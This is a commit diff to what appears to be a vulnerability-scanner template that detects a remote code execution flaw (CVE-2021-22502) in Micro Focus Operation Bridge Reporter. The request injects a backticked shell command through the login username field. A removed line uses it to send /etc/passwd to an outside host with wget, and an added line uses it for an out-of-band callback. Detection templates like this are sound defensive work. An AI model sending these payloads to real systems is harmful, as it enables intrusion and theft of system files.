updated matcher and request

2023-03-30 22:41:53 +05:30 · 2023-03-30 22:41:53 +05:30 · 603b425bec
parent fa4a6678c6
commit 603b425bec
1 changed files with 23 additions and 21 deletions
--- a/cves/2021/CVE-2021-22502.yaml
+++ b/cves/2021/CVE-2021-22502.yaml
@ -1,13 +1,17 @@
 id: CVE-2021-22502

 info:
-  name: Micro Focus Operation Bridge Reporter (OBR) RCE
+  name: Micro Focus Operation Bridge Reporter (OBR) - Remote Code Execution
  author: pikpikcu
  severity: critical
-  reference: |
-      https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
-      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502
-  tags: cve,cve2021,obr,rce
+  description: |
+    Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.
+  reference:
+    - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22502
+  classification:
+    cve-id: CVE-2021-22502
+  tags: cve,cve2021,microfocus,obr,rce

 requests:
  - raw:
@ -15,30 +19,28 @@ requests:
        POST /AdminService/urest/v1/LogonResource HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
-        Content-Length: 69

-        {"userName":"administrator","credential":"password"}
-      - |
-        POST /AdminService/urest/v1/LogonResource HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-        Content-Length: 69
-
-        {"userName":"something `wget --post-file /etc/passwd burpcollaborator.net`","credential":"whatever"}
+        {"userName":"something `wget {{interactsh-url}}`","credential":"whatever"}

    matchers-condition: and
    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+          - "dns"

      - type: word
+        part: body
+        words:
+          - "An error occurred"
+          - "AUTHENTICATION_FAILED"
+        condition: and
+
+      - type: word
+        part: header
        words:
          - "application/json"
-        part: header
-
-      - type: word
-        words:
-          - "An error occurred. Please contact your system administrator"
-        part: body
-        condition: and

      - type: status
        status: